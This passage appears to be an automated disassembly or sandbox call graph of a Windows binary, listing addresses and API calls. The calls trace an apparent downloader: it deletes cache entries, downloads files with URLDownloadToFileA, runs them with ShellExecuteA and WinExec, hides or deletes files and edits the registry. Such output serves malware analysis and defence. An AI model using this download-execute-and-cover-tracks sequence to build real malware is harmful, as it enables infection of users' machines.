6255->6256 6256->6254 6258 403d50 RegDeleteValueA RegCloseKey 6257->6258 6258->6119 6260 404f2c 28 API calls 6259->6260 6261 407df9 6260->6261 6262 403b5c 27 API calls 6261->6262 6263 407e06 6262->6263 6264 404af8 30 API calls 6263->6264 6265 407e25 6264->6265 6266 4039d0 11 API calls 6265->6266 6267 407e2f 6266->6267 6268 404dd0 27 API calls 6267->6268 6269 407e40 6268->6269 6270 404dd0 27 API calls 6269->6270 6271 407e56 6270->6271 6272 404c18 31 API calls 6271->6272 6273 407e6b 6272->6273 6274 403a24 27 API calls 6273->6274 6275 407e78 6274->6275 6276 407e87 6275->6276 6472 4068d0 InternetGetConnectedState 6275->6472 6278 4039f4 11 API calls 6276->6278 6279 407ea1 6278->6279 6281 404dd0 27 API calls 6280->6281 6282 407f89 6281->6282 6283 404dd0 27 API calls 6282->6283 6284 407f9f 6283->6284 6285 404af8 30 API calls 6284->6285 6286 407fb4 6285->6286 6287 404f2c 28 API calls 6286->6287 6288 407fbc 6287->6288 6289 403b5c 27 API calls 6288->6289 6290 407fc9 6289->6290 6291 404af8 30 API calls 6290->6291 6292 407fe8 6291->6292 6293 407ff7 6292->6293 6519 406708 InternetGetConnectedState 6292->6519 6295 4039f4 11 API calls 6293->6295 6296 408011 6295->6296 6298 408494 46 API calls 6297->6298 6299 4084c7 6298->6299 6301 407c12 6300->6301 6302 407d0f 6300->6302 6301->6302 6305 404f2c 28 API calls 6301->6305 6303 4039f4 11 API calls 6302->6303 6304 407d29 6303->6304 6306 407c31 6305->6306 6307 403b5c 27 API calls 6306->6307 6308 407c3e 6307->6308 6309 404cf4 4 API calls 6308->6309 6310 407c46 6309->6310 6310->6302 6311 404f2c 28 API calls 6310->6311 6312 407c5a 6311->6312 6313 403b5c 27 API calls 6312->6313 6314 407c67 6313->6314 6315 407c7c URLDownloadToFileA 6314->6315 6316 407c92 6315->6316 6317 407c88 Sleep 6315->6317 6318 404f2c 28 API calls 6316->6318 6317->6316 6319 407c9c 6318->6319 6320 403b5c 27 API calls 6319->6320 6321 407ca9 6320->6321 6322 404f2c 28 API calls 6321->6322 6323 407cba 6322->6323 6324 403b5c 27 API calls 6323->6324 6325 407cc7 6324->6325 6326 407ccf CopyFileA Sleep 6325->6326 6327 404f2c 28 API calls 6326->6327 6328 407ced 6327->6328 6329 403b5c 27 API calls 6328->6329 6330 407cfa 6329->6330 6331 407d02 ShellExecuteA 6330->6331 6331->6302 6333 4072b4 6332->6333 6334 404d04 GetVersionExA 6333->6334 6335 4072cf 6334->6335 6336 4072d8 6335->6336 6337 4076df Sleep 6335->6337 6338 404f2c 28 API calls 6336->6338 6339 404f2c 28 API calls 6337->6339 6340 4072e0 6338->6340 6341 4076f3 6339->6341 6342 403b5c 27 API calls 6340->6342 6343 403b5c 27 API calls 6341->6343 6344 4072ed 6342->6344 6345 407700 6343->6345 6347 4027c8 4 API calls 6344->6347 6346 407708 SetFileAttributesA 6345->6346 6348 404f2c 28 API calls 6346->6348 6349 407304 6347->6349 6350 407716 6348->6350 6351 402560 4 API calls 6349->6351 6352 403b5c 27 API calls 6350->6352 6353 407309 6351->6353 6354 407723 6352->6354 6355 403ed8 4 API calls 6353->6355 6357 404af8 30 API calls 6354->6357 6356 407318 6355->6356 6358 4030f4 4 API calls 6356->6358 6360 407742 6357->6360 6359 40731d 6358->6359 6361 402560 4 API calls 6359->6361 6363 4039f4 11 API calls 6360->6363 6362 407322 6361->6362 6364 402ba8 4 API calls 6362->6364 6365 40775c 6363->6365 6366 40732c 6364->6366 6367 402560 4 API calls 6366->6367 6368 407331 6367->6368 6369 404f2c 28 API calls 6368->6369 6370 407339 6369->6370 6371 403b5c 27 API calls 6370->6371 6372 407346 6371->6372 6373 4027d4 4 API calls 6372->6373 6374 40735d 6373->6374 6375 402560 4 API calls 6374->6375 6376 407362 6375->6376 6377 403ed8 4 API calls 6376->6377 6378 407371 6377->6378 6379 4030f4 4 API calls 6378->6379 6380 407376 6379->6380 6381 402560 4 API calls 6380->6381 6382 40737b 6381->6382 6383 403ed8 4 API calls 6382->6383 6384 40738a 6383->6384 6385 4030f4 4 API calls 6384->6385 6386 40738f 6385->6386 6387 402560 4 API calls 6386->6387 6388 407394 6387->6388 6389 402ba8 4 API calls 6388->6389 6390 40739e 6389->6390 6391 402560 4 API calls 6390->6391 6392 4073a3 Sleep 6391->6392 6393 404f2c 28 API calls 6392->6393 6394 4073be 6393->6394 6395 403c14 27 API calls 6394->6395 6396 4073d3 6395->6396 6397 4073db 15 API calls 6396->6397 6398 407549 6397->6398 6399 40753a SendMessageA 6397->6399 6400 404854 49 API calls 6398->6400 6399->6398 6401 407553 6400->6401 6402 404854 49 API calls 6401->6402 6403 40755d 6402->6403 6404 404854 49 API calls 6403->6404 6405 407567 6404->6405 6406 404854 49 API calls 6405->6406 6407 407571 6406->6407 6408 404854 49 API calls 6407->6408 6409 40757b 6408->6409 6410 404854 49 API calls 6409->6410 6411 407585 6410->6411 6412 404854 49 API calls 6411->6412 6413 40758f 6412->6413 6414 404854 49 API calls 6413->6414 6415 407599 6414->6415 6416 404854 49 API calls 6415->6416 6417 4075a3 6416->6417 6418 404854 49 API calls 6417->6418 6419 4075ad 6418->6419 6420 404854 49 API calls 6419->6420 6421 4075b7 6420->6421 6422 404854 49 API calls 6421->6422 6423 4075c1 6422->6423 6424 404854 49 API calls 6423->6424 6425 4075cb 6424->6425 6426 404854 49 API calls 6425->6426 6427 4075d5 6426->6427 6428 404854 49 API calls 6427->6428 6429 4075df 6428->6429 6430 404854 49 API calls 6429->6430 6431 4075e9 6430->6431 6432 404854 49 API calls 6431->6432 6433 4075f3 6432->6433 6434 404854 49 API calls 6433->6434 6435 4075fd 6434->6435 6436 404854 49 API calls 6435->6436 6437 407607 6436->6437 6438 404854 49 API calls 6437->6438 6439 407611 6438->6439 6440 404854 49 API calls 6439->6440 6441 40761b 6440->6441 6442 404854 49 API calls 6441->6442 6443 407625 6442->6443 6444 404854 49 API calls 6443->6444 6445 40762f 6444->6445 6446 404854 49 API calls 6445->6446 6447 407639 6446->6447 6448 404854 49 API calls 6447->6448 6449 407643 6448->6449 6450 404854 49 API calls 6449->6450 6451 40764d 6450->6451 6452 404854 49 API calls 6451->6452 6453 407657 6452->6453 6454 404854 49 API calls 6453->6454 6455 407661 6454->6455 6456 404f2c 28 API calls 6455->6456 6457 40766b 6456->6457 6458 403b5c 27 API calls 6457->6458 6459 407678 6458->6459 6460 407680 SetFileAttributesA 6459->6460 6461 404f2c 28 API calls 6460->6461 6462 40768e 6461->6462 6463 403b5c 27 API calls 6462->6463 6464 40769b 6463->6464 6465 404af8 30 API calls 6464->6465 6466 4076ba 6465->6466 6467 404f2c 28 API calls 6466->6467 6468 4076c2 6467->6468 6469 403b5c 27 API calls 6468->6469 6470 4076cf 6469->6470 6471 4076d7 DeleteFileA 6470->6471 6471->6360 6473 4068e8 6472->6473 6474 4068ed 6472->6474 6476 406728 6473->6476 6474->6276 6504 404f84 GetSystemDirectoryA 6476->6504 6479 403b5c 27 API calls 6480 406757 6479->6480 6509 404cf4 6480->6509 6483 406824 6485 4039f4 11 API calls 6483->6485 6487 40683e 6485->6487 6486 40676c 6488 4067d7 6486->6488 6489 406788 6486->6489 6487->6474 6490 404dd0 27 API calls 6488->6490 6491 404dd0 27 API calls 6489->6491 6492 4067e8 6490->6492 6493 406799 6491->6493 6495 404dd0 27 API calls 6492->6495 6494 404dd0 27 API calls 6493->6494 6496 4067af 6494->6496 6497 4067fe 6495->6497 6499 404dd0 27 API calls 6496->6499 6498 404dd0 27 API calls 6497->6498 6500 406814 6498->6500 6501 4067c5 6499->6501 6502 40681c ShellExecuteA 6500->6502 6503 4067cd ShellExecuteA 6501->6503 6502->6483 6503->6483 6505 403b3c 27 API calls 6504->6505 6507 404faa 6505->6507 6506 404fc6 6506->6479 6507->6506 6508 403b5c 27 API calls 6507->6508 6508->6506 6513 404c8c 6509->6513 6512 402728 GetSystemTime 6512->6486 6514 403d4c 6513->6514 6515 404ca6 FindFirstFileA 6514->6515 6516 404cb1 FindClose 6515->6516 6517 404ce5 6515->6517 6516->6517 6518 404cc0 FileTimeToLocalFileTime FileTimeToDosDateTime 6516->6518 6517->6483 6517->6512 6518->6517 6520 406720 6519->6520 6521 406725 6519->6521 6523 4066f8 6520->6523 6521->6293 6530 4055d8 6523->6530 6531 4055e0 6530->6531 6531->6531 6532 4039d0 11 API calls 6531->6532 6533 4055ff 6532->6533 6534 404dd0 27 API calls 6533->6534 6535 40560c 6534->6535 6536 403b00 27 API calls 6535->6536 6537 405620 6536->6537 6538 404f2c 28 API calls 6537->6538 6539 405628 6538->6539 6540 404dd0 27 API calls 6539->6540 6541 405636 6540->6541 6542 403b5c 27 API calls 6541->6542 6543 40563e 6542->6543 6544 403b00 27 API calls 6543->6544 6545 405656 6544->6545 6546 405662 DeleteUrlCacheEntry 6545->6546 6547 403d4c 6546->6547 6548 405674 DeleteFileA 6547->6548 6549 40568a 6548->6549 6550 405697 URLDownloadToFileA 6549->6550 6551 4056a3 Sleep 6550->6551 6552 4056ad 6550->6552 6551->6552 6553 404cf4 4 API calls 6552->6553 6554 4056b9 6553->6554 6555 4056c1 6554->6555 6556 405859 6554->6556 6785 4027bc 6555->6785 6557 4039f4 11 API calls 6556->6557 6558 405873 6557->6558 6612 4058d0 6558->6612 6567 402560 4 API calls 6568 405701 6567->6568 6804 402ba8 6568->6804 6571 402560 4 API calls 6572 405710 6571->6572 6573 404f2c 28 API calls 6572->6573 6574 40571c 6573->6574 6575 405018 27 API calls 6574->6575 6576 40572f 6575->6576 6577 403b5c 27 API calls 6576->6577 6578 405738 6577->6578 6579 40574d URLDownloadToFileA 6578->6579 6580 405763 6579->6580 6581 405759 Sleep 6579->6581 6582 404f2c 28 API calls 6580->6582 6581->6580 6583 40576b 6582->6583 6584 405018 27 API calls 6583->6584 6585 40577e 6584->6585 6586 403b5c 27 API calls 6585->6586 6587 405787 6586->6587 6588 404cf4 4 API calls 6587->6588 6589 40578f 6588->6589 6589->6556 6590 404f2c 28 API calls 6589->6590 6591 4057a5 6590->6591 6592 405018 27 API calls 6591->6592 6593 4057b8 6592->6593 6594 403b5c 27 API calls 6593->6594 6595 4057c1 6594->6595 6596 404dd0 27 API calls 6595->6596 6597 4057d7 6596->6597 6598 4057df ShellExecuteA Sleep 6597->6598 6599 403d4c 6598->6599 6600 4057fd DeleteFileA 6599->6600 6601 403d4c 6600->6601 6602 40580f DeleteUrlCacheEntry 6601->6602 6603 403d4c 6602->6603 6604 405821 DeleteUrlCacheEntry 6603->6604 6605 404f2c 28 API calls 6604->6605 6606 40582f 6605->6606 6607 405018 27 API calls 6606->6607 6608 405842 6607->6608 6609 403b5c 27 API calls 6608->6609 6610 40584b 6609->6610 6611 405853 DeleteFileA 6610->6611 6611->6556 6613 4058d8 6612->6613 6613->6613 6614 4039d0 11 API calls 6613->6614 6615 4058f7 6614->6615 6616 404dd0 27 API calls 6615->6616 6617 405907 6616->6617 6618 403b00 27 API calls 6617->6618 6619 40591e 6618->6619 6620 404f2c 28 API calls 6619->6620 6621 405929 6620->6621 6622 404dd0 27 API calls 6621->6622 6623 405940 6622->6623 6624 403b5c 27 API calls 6623->6624 6625 40594c 6624->6625 6626 403b00 27 API calls 6625->6626 6627 405963 6626->6627 6628 40596f DeleteUrlCacheEntry 6627->6628 6629 403d4c 6628->6629 6630 405981 DeleteFileA 6629->6630 6631 405997 6630->6631 6632 4059a4 URLDownloadToFileA 6631->6632 6633 4059b0 Sleep 6632->6633 6634 4059ba 6632->6634 6633->6634 6635 404cf4 4 API calls 6634->6635 6637 4059c6 6635->6637 6636 405c65 6638 4039f4 11 API calls 6636->6638 6637->6636 6639 4027bc 4 API calls 6637->6639 6640 405c82 6638->6640 6642 4059ea 6639->6642 6641 4039d0 11 API calls 6640->6641 6643 405c8a 6641->6643 6644 402560 4 API calls 6642->6644 6734 405d7c 6643->6734 6645 4059ef 6644->6645 6646 402dec 27 API calls 6645->6646 6647 4059ff 6646->6647 6648 402e58 4 API calls 6647->6648 6649 405a09 6648->6649 6650 402560 4 API calls 6649->6650 6651 405a0e 6650->6651 6652 402ba8 4 API calls 6651->6652 6653 405a18 6652->6653 6654 402560 4 API calls 6653->6654 6655 405a1d GetEnvironmentVariableA SHGetSpecialFolderLocation SHGetPathFromIDList 6654->6655 6656 403b3c 27 API calls 6655->6656 6657 405a63 6656->6657 6658 404dd0 27 API calls 6657->6658 6659 405a73 6658->6659 6823 403ba0 6659->6823 6661 405a87 6838 4027c8 6661->6838 6664 402560 4 API calls 6665 405aad 6664->6665 6666 404dd0 27 API calls 6665->6666 6667 405abd 6666->6667 6841 403ed8 6667->6841 6672 402560 4 API calls 6673 405ad7 6672->6673 6674 402ba8 4 API calls 6673->6674 6675 405ae1 6674->6675 6676 402560 4 API calls 6675->6676 6677 405ae6 6676->6677 6678 404dd0 27 API calls 6677->6678 6679 405af6 6678->6679 6680 403ba0 27 API calls 6679->6680 6681 405b0a 6680->6681 6852 4027d4 6681->6852 6684 402560 4 API calls 6685 405b30 6684->6685 6686 404dd0 27 API calls 6685->6686 6687 405b40 6686->6687 6688 403b5c 27 API calls 6687->6688 6689 405b53 6688->6689 6690 403ed8 4 API calls 6689->6690 6691 405b63 6690->6691 6692 4030f4 4 API calls 6691->6692 6693 405b68 6692->6693 6694 402560 4 API calls 6693->6694 6695 405b6d 6694->6695 6855 404d04 GetVersionExA 6695->6855 6697 405b72 6698 405c28 6697->6698 6699 405b7b 6697->6699 6700 402ba8 4 API calls 6698->6700 6701 404dd0 27 API calls 6699->6701 6702 405c32 6700->6702 6703 405b8b 6701->6703 6704 402560 4 API calls 6702->6704 6705 403b3c 27 API calls 6703->6705 6706 405c37 Sleep 6704->6706 6707 405ba7 6705->6707 6708 403d4c 6706->6708 6709 404dd0 27 API calls 6707->6709 6710 405c4d DeleteFileA 6708->6710 6711 405bbd 6709->6711 6712 403d4c 6710->6712 6713 403c14 27 API calls 6711->6713 6715 405c5f DeleteUrlCacheEntry 6712->6715 6714 405bd3 6713->6714 6716 403ed8 4 API calls 6714->6716 6715->6636 6717 405be3 6716->6717 6718 4030f4 4 API calls 6717->6718 6719 405be8 6718->6719 6720 402560 4 API calls 6719->6720 6721 405bed 6720->6721 6722 404dd0 27 API calls 6721->6722 6723 405bfd 6722->6723 6724 403ed8 4 API calls 6723->6724 6725 405c0d 6724->6725 6726 4030f4 4 API calls 6725->6726 6727 405c12 6726->6727 6728 402560 4 API calls 6727->6728 6729 405c17 6728->6729 6730 402ba8 4 API calls 6729->6730 6731 405c21 6730->6731 6732 402560 4 API calls 6731->6732 6733 405c26 6732->6733 6733->6706 6735 4039d0 11 API calls 6734->6735 6736 405d9e 6735->6736 6737 404dd0 27 API calls 6736->6737 6738 405dab 6737->6738 6739 403b00 27 API calls 6738->6739 6740 405dbf 6739->6740 6741 404f2c 28 API calls 6740->6741 6742 405dc7 6741->6742 6743 404dd0 27 API calls 6742->6743 6744 405dd8 6743->6744 6745 403b5c 27 API calls 6744->6745 6746 405de1 6745->6746 6747 403b00 27 API calls 6746->6747 6748 405df5 6747->6748 6749 405e01 DeleteUrlCacheEntry 6748->6749 6750 403d4c 6749->6750 6751 405e13 DeleteFileA 6750->6751 6752 405e29 6751->6752 6753 405e36 URLDownloadToFileA 6752->6753 6754 405e42 Sleep 6753->6754 6755 405e4c 6753->6755 6754->6755 6756 404cf4 4 API calls 6755->6756 6757 405e58 6756->6757 6758 405e60 6757->6758 6759 405f21 6757->6759 6762 4027bc 4 API calls 6758->6762 6760 4039f4 11 API calls 6759->6760 6761 405f3b 6760->6761 6761->6521 6763 405e7c 6762->6763 6764 402560 4 API calls 6763->6764 6765 405e81 6764->6765 6766 402dec 27 API calls 6765->6766 6767 405e91 6766->6767 6768 402e58 4 API calls 6767->6768 6769 405e9b 6768->6769 6770 402560 4 API calls 6769->6770 6771 405ea0 6770->6771 6772 402ba8 4 API calls 6771->6772 6773 405eaa 6772->6773 6774 402560 4 API calls 6773->6774 6775 405eaf 6774->6775 6776 404dd0 27 API calls 6775->6776 6777 405ecd 6776->6777 6778 404dd0 27 API calls 6777->6778 6779 405ee3 6778->6779 6780 405eeb ShellExecuteA Sleep 6779->6780 6781 403d4c 6780->6781 6782 405f09 DeleteFileA 6781->6782 6783 403d4c 6782->6783 6784 405f1b DeleteUrlCacheEntry 6783->6784 6784->6759 6811 402764 6785->6811 6788 402560 6789 404164 4 API calls 6788->6789 6790 402568 6789->6790 6791 402dec 6790->6791 6792 4039d0 11 API calls 6791->6792 6793 402df9 6792->6793 6817 402de0 6793->6817 6795 402e4d 6800 402e58 6795->6800 6796 402de0 4 API calls 6798 402e0d 6796->6798 6797 403b5c 27 API calls 6797->6798 6798->6795 6798->6796 6798->6797 6799 4039d0 11 API calls 6798->6799 6799->6798 6803 402e5b 6800->6803 6801 402e84 6801->6567 6802 402d00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6802->6803 6803->6801 6803->6802 6805 402be7 6804->6805 6806 402bb8 6804->6806 6807 402be5 6805->6807 6808 402580 4 API calls 6805->6808 6806->6805 6809 402bbe 6806->6809 6807->6571 6808->6807 6809->6807 6820 402580 6809->6820 6812 402774 6811->6812 6813 40277a 6811->6813 6812->6813 6815 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6812->6815 6814 4027b7 6813->6814 6816 402580 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6813->6816 6814->6788 6815->6813 6816->6814 6818 402d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6817->6818 6819 402de7 6818->6819 6819->6798 6821 404164 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6820->6821 6822 402588 6821->6822 6822->6807 6824 403ba4 6823->6824 6825 403c05 6823->6825 6826 403a24 6824->6826 6827 403bac 6824->6827 6832 403a94 27 API calls 6826->6832 6833 403a38 6826->6833 6827->6825 6829 403bbb 6827->6829 6830 403a24 27 API calls 6827->6830 6828 403a66 6828->6661 6831 403a94 27 API calls 6829->6831 6830->6829 6835 403bd5 6831->6835 6832->6833 6833->6828 6834 40248c 11 API calls 6833->6834 6834->6828 6836 403a24 27 API calls 6835->6836 6837 403c01 6836->6837 6837->6661 6839 402764 4 API calls 6838->6839 6840 4027d1 6839->6840 6840->6664 6857 403ee0 6841->6857 6843 403edf 6844 4030f4 6843->6844 6845 40311a 6844->6845 6846 4030ff 6844->6846 6848 403024 4 API calls 6845->6848 6864 403024 6846->6864 6849 403116 6848->6849 6861 402ae8 6849->6861 6853 402764 4 API calls 6852->6853 6854 4027dd 6853->6854 6854->6684 6856 404d23 6855->6856 6856->6697 6858 403eeb 6857->6858 6859 403078 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6858->6859 6860 403ef6 6859->6860 6862 402aa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6861->6862 6863 402af0 6862->6863 6863->6672 6865 403030 6864->6865 6868 403038 6864->6868 6866 402fe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6865->6866 6866->6868 6867 40306f 6867->6849 6868->6867 6869 402580 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6868->6869 6870 40306a 6869->6870 6870->6849 6871->5948 6872->5950 6873->5952 6874->5961 6881 408183 6880->6881 6884 4080eb 6880->6884 6882 4039f4 11 API calls 6881->6882 6883 40819d 6882->6883 6898 4081e8 6883->6898 6884->6881 6885 40810e DeleteUrlCacheEntry 6884->6885 6886 404f2c 28 API calls 6885->6886 6887 40811c 6886->6887 6888 403b5c 27 API calls 6887->6888 6889 408129 6888->6889 6890 408131 DeleteFileA 6889->6890 6891 404f2c 28 API calls 6890->6891 6892 408143 6891->6892 6893 403b5c 27 API calls 6892->6893 6894 408150 6893->6894 6895 408165 URLDownloadToFileA 6894->6895 6895->6881 6896 408171 6895->6896 6897 40817d DeleteUrlCacheEntry 6896->6897 6897->6881 6899 4083a8 6898->6899 6901 40820e 6898->6901 6900 4039f4 11 API calls 6899->6900 6902 4083c2 6900->6902 6901->6899 6903 408231 DeleteUrlCacheEntry 6901->6903 6902->5995 6904 404f2c 28 API calls 6903->6904 6905 40823f 6904->6905 6906 403b5c 27 API calls 6905->6906 6907 40824c 6906->6907 6908 408254 DeleteFileA 6907->6908 6909 404f2c 28 API calls 6908->6909 6910 408266 6909->6910 6911 403b5c 27 API calls 6910->6911 6912 408273 6911->6912 6913 408288 URLDownloadToFileA 6912->6913 6914 408294 Sleep 6913->6914 6915 40829e 6913->6915 6914->6915 6916 404f2c 28 API calls 6915->6916 6917 4082a6 6916->6917 6918 403b5c 27 API calls 6917->6918 6919 4082b3 6918->6919 6920 404cf4 4 API calls 6919->6920 6921 4082bb 6920->6921 6921->6899 6922 404f2c 28 API calls 6921->6922 6923 4082cb 6922->6923 6924 403b5c 27 API calls 6923->6924 6925 4082d8 6924->6925 6926 4027bc 4 API calls 6925->6926 6927 4082ef 6926->6927 6928 402560 4 API calls 6927->6928 6929 4082f4 6928->6929 6930 402dec 27 API calls 6929->6930 6931 408304 6930->6931 6932 402e58 4 API calls 6931->6932 6933 40830e 6932->6933 6934 402560 4 API calls 6933->6934 6935 408313 6934->6935 6936 402ba8 4 API calls 6935->6936 6937 40831d 6936->6937 6938 402560 4 API calls 6937->6938 6939 408322 6938->6939 6940 404af8 30 API calls 6939->6940 6941 408345 6940->6941 6942 408373 6941->6942 6943 408358 6941->6943 6945 40837f DeleteUrlCacheEntry 6942->6945 6944 404af8 30 API calls 6943->6944 6944->6942 6946 404f2c 28 API calls 6945->6946 6947 40838d 6946->6947 6948 403b5c 27 API calls 6947->6948 6949 40839a 6948->6949 6950 4083a2 DeleteFileA 6949->6950 6950->6899 6952 403a94 27 API calls 6951->6952 6953 403ad0 6952->6953 6954 4039d0 11 API calls 6953->6954 6955 403ae8 6954->6955 6955->5718 6955->5719 6957 402f9e 6956->6957 6992 402eb0 6957->6992 6961 402c76 6960->6961 6962 402c4d 6960->6962 6964 402580 4 API calls 6961->6964 6962->6961 6963 402c53 GetFileSize 6962->6963 6965 402c64 6963->6965 6966 402c69 6963->6966 6964->6966 7005 402590 GetLastError 6965->7005 6966->5734 6969 402fd5 6968->6969 6970 402fbc SetFilePointer 6968->6970 6971 402590 GetLastError 6970->6971 6972 402fd4 6970->6972 6973 402580 4 API calls 6971->6973 6972->5737 6974 40259a 6973->6974 6974->5737 7008 402afc 6975->7008 6979 404d57 6978->6979 6980 404d70 6979->6980 6982 404d79 6979->6982 6981 4039d0 11 API calls 6980->6981 6983 404d77 6981->6983 6984 403da4 27 API calls 6982->6984 6985 403da4 6983->6985 6984->6983 6986 403dd6 6985->6986 6987 403da9 6985->6987 6988 4039d0 11 API calls 6986->6988 6987->6986 6989 403dbd 6987->6989 6991 403dcc 6988->6991 6990 403ac0 27 API calls 6989->6990 6990->6991 6991->5762 6993 402edc 6992->6993 7001 402ec7 6992->7001 6995 402ef9 CreateFileA 6993->6995 6997 402f59 GetStdHandle 6993->6997 6994 402f72 6998 402580 4 API calls 6994->6998 6999 402f50 6995->6999 6997->6999 7002 402f55 6998->7002 6999->7002 7003 402f79 GetLastError 6999->7003 7001->6993 7001->6994 7004 402580 4 API calls 7001->7004 7002->5730 7003->6994 7004->6993 7006 402580 4 API calls 7005->7006 7007 40259a 7006->7007 7007->6966 7009 402b16 ReadFile 7008->7009 7010 402b6e 7008->7010 7012 402b2d GetLastError 7009->7012 7013 402b3e 7009->7013 7011 402580 4 API calls 7010->7011 7015 402b37 7011->7015 7014 402580 4 API calls 7012->7014 7013->7015 7016 402580 4 API calls 7013->7016 7014->7015 7015->5742 7016->7015 7017->5814 7019 405135 7018->7019 7020 403b3c 27 API calls 7018->7020 7029 4026c8 7019->7029 7020->7019 7023 403c14 27 API calls 7024 405168 7023->7024 7025 405173 WinExec 7024->7025 7026 405186 7025->7026 7027 4039f4 11 API calls 7026->7027 7028 405196 7027->7028 7028->5684 7030 4039d0 11 API calls 7029->7030 7031 4026dc 7030->7031 7032 4026e0 GetModuleFileNameA 7031->7032 7033 4026fe GetCommandLineA 7031->7033 7034 403ac0 27 API calls 7032->7034 7037 402705 7033->7037 7036 4026fc 7034->7036 7036->7023 7037->7036 7038 4025dc 7037->7038 7039 4025ee 7038->7039 7040 4025e6 CharNextA 7039->7040 7045 402608 7039->7045 7040->7039 7041 402657 7042 403e74 27 API calls 7041->7042 7051 402660 7042->7051 7043 402612 CharNextA 7043->7045 7044 402643 CharNextA 7044->7045 7045->7041 7045->7043 7045->7044 7046 40261c CharNextA 7045->7046 7047 402639 CharNextA 7045->7047 7046->7045 7047->7045 7048 4026bf 7048->7037 7049 4026a4 CharNextA 7049->7051 7050 40266c CharNextA 7050->7051 7051->7048 7051->7049 7051->7050 7052 402676 CharNextA 7051->7052 7053 40269a CharNextA 7051->7053 7052->7051 7053->7051 7241 40285c CloseHandle 7272 40286c 7277 40285c CloseHandle 7272->7277 7274 40287c 7275 402880 GetLastError 7274->7275 7276 402887 7274->7276 7277->7274 7224 4381fa 7225 438214 7224->7225 7226 43851d 7225->7226 7227 438231 VirtualAlloc 7225->7227 7227->7226 7228 438273 7227->7228 7230 43827e 7228->7230 7231 438294 7230->7231 7233 43834b 7231->7233 7234 43835e VirtualFree 7233->7234 7237 438408 7234->7237 7236 438524 LoadLibraryA 7240 43844c 7236->7240 7237->7236 7238 438518 7239 4384f9 VirtualProtect 7239->7238 7239->7239 7240->7238 7240->7239 7698 402e86 7703 40285c CloseHandle 7698->7703 7700 402e9b 7701 402ea4 7700->7701 7702 402590 5 API calls 7700->7702 7702->7701 7703->7700 7242 40288c 7243 4028a2 7242->7243 7244 402904 CreateFileA 7243->7244 7245 4029b6 GetStdHandle 7243->7245 7255 4028a8 7243->7255 7246 402922 7244->7246 7247 402a2a GetLastError 7244->7247 7245->7247 7250 4029f1 7245->7250 7249 402930 GetFileSize 7246->7249 7246->7250 7247->7255 7249->7247 7251 402944 SetFilePointer 7249->7251 7252 4029fb GetFileType 7250->7252 7250->7255 7251->7247 7256 402960 ReadFile 7251->7256 7254 402a16 CloseHandle 7252->7254 7252->7255 7254->7255 7256->7247 7257 402982 7256->7257 7257->7250 7258 402995 SetFilePointer 7257->7258 7258->7247 7259 4029aa SetEndOfFile 7258->7259 7259->7247 7260 4029b4 7259->7260 7260->7250 7307 404412 7308 404414 CreateWindowExA 7307->7308 7208 404a98 7209 404ab1 NtdllDefWindowProc_A 7208->7209 7210 404aa8 PostQuitMessage 7208->7210 7211 404ac5 7209->7211 7210->7211 5605 402820 5606 402830 WriteFile 5605->5606 5608 40282c 5605->5608 5607 402848 GetLastError 5606->5607 5606->5608 5607->5608 7861 4023a9 7862 4023bc 7861->7862 7863 4023c1 7861->7863 7866 4017b8 4 API calls 7862->7866 7864 4023f0 7863->7864 7865 4023e6 RtlEnterCriticalSection 7863->7865 7869 4023c5 7863->7869 7876 4021d8 7864->7876 7865->7864 7866->7863 7870 4023fd 7872 402458 7870->7872 7873 40244e RtlLeaveCriticalSection 7870->7873 7871 401ea4 14 API calls 7874 402409 7871->7874 7873->7872 7874->7870 7886 402034 7874->7886 7877 4021ec 7876->7877 7879 402290 7877->7879 7880 40220d 7877->7880 7878 40221c 7878->7870 7878->7871 7879->7878 7884 40232d 7879->7884 7903 401c4c 7879->7903 7911 401d50 7879->7911 7880->7878 7900 401a20 7880->7900 7884->7878 7907 401bc4 7884->7907 7887 402052 7886->7887 7888 40204d 7886->7888 7890 402083 RtlEnterCriticalSection 7887->7890 7892 40208d 7887->7892 7894 402056 7887->7894 7889 4017b8 4 API calls 7888->7889 7889->7887 7890->7892 7891 402099 7895 4021c5 7891->7895 7896 4021bb RtlLeaveCriticalSection 7891->7896 7892->7891 7893 40211c 7892->7893 7898 402148 7892->7898 7893->7894 7897 401c4c 7 API calls 7893->7897 7894->7870 7895->7870 7896->7895 7897->7894 7898->7891 7899 401bc4 7 API calls 7898->7899 7899->7891 7901 402034 9 API calls 7900->7901 7902 401a41 7901->7902 7902->7878 7904 401c5e 7903->7904 7905 401c55 7903->7905 7904->7879 7905->7904 7906 401a20 9 API calls 7905->7906 7906->7904 7908 401c19 7907->7908 7910 401be2 7907->7910 7908->7910 7916 401b14 7908->7916 7910->7878 7971 401608 7911->7971 7913 401d65 7914 401d72 7913->7914 7982 401c98 7913->7982 7914->7879 7917 401b2a 7916->7917 7918 401b55 7917->7918 7919 401b69 7917->7919 7928 401bb2 7917->7928 7929 40172c 7918->7929 7921 40172c 3 API calls 7919->7921 7922 401b67 7921->7922 7922->7928 7939 4019f0 7922->7939 7924 401ba7 7949 401240 7924->7949 7925 401b8d 7925->7924 7944 401a44 7925->7944 7928->7910 7930 401752 7929->7930 7938 4017ab 7929->7938 7953 4014f8 7930->7953 7934 401786 7937 401240 LocalAlloc 7934->7937 7934->7938 7937->7938 7938->7922 7940 401a0d 7939->7940 7941 4019fe 7939->7941 7940->7925 7942 401bc4 9 API calls 7941->7942 7943 401a0b 7942->7943 7943->7925 7945 401a57 7944->7945 7946 401a49 7944->7946 7945->7924 7947 401a20 9 API calls 7946->7947 7948 401a56 7947->7948 7948->7924 7950 40124b 7949->7950 7951 401266 7950->7951 7952 401184 LocalAlloc 7950->7952 7951->7928 7952->7951 7955 40152f 7953->7955 7954 40156f 7957 4011cc 7954->7957 7955->7954 7956 401549 VirtualFree 7955->7956 7956->7955 7958 4011e8 7957->7958 7965 401184 7958->7965 7961 4013ac 7964 4013db 7961->7964 7962 401434 7962->7934 7963 401408 VirtualFree 7963->7964 7964->7962 7964->7963 7968 40112c 7965->7968 7967 40118f 7967->7934 7967->7961 7969 401138 LocalAlloc 7968->7969 7970 40114a 